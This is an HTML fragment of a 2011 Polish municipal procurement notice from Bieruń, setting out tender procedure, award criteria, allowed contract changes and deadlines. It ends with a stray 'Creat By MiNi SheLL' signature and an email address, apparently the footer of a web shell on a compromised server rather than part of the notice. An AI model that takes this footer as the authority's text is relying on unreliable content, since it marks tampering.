<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej z wykonawcą umowy w zakresie:
a.  wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany  zgodnie   z obowiązującą stawką;
b. mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
c. innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie    wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2011 godzina 10:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com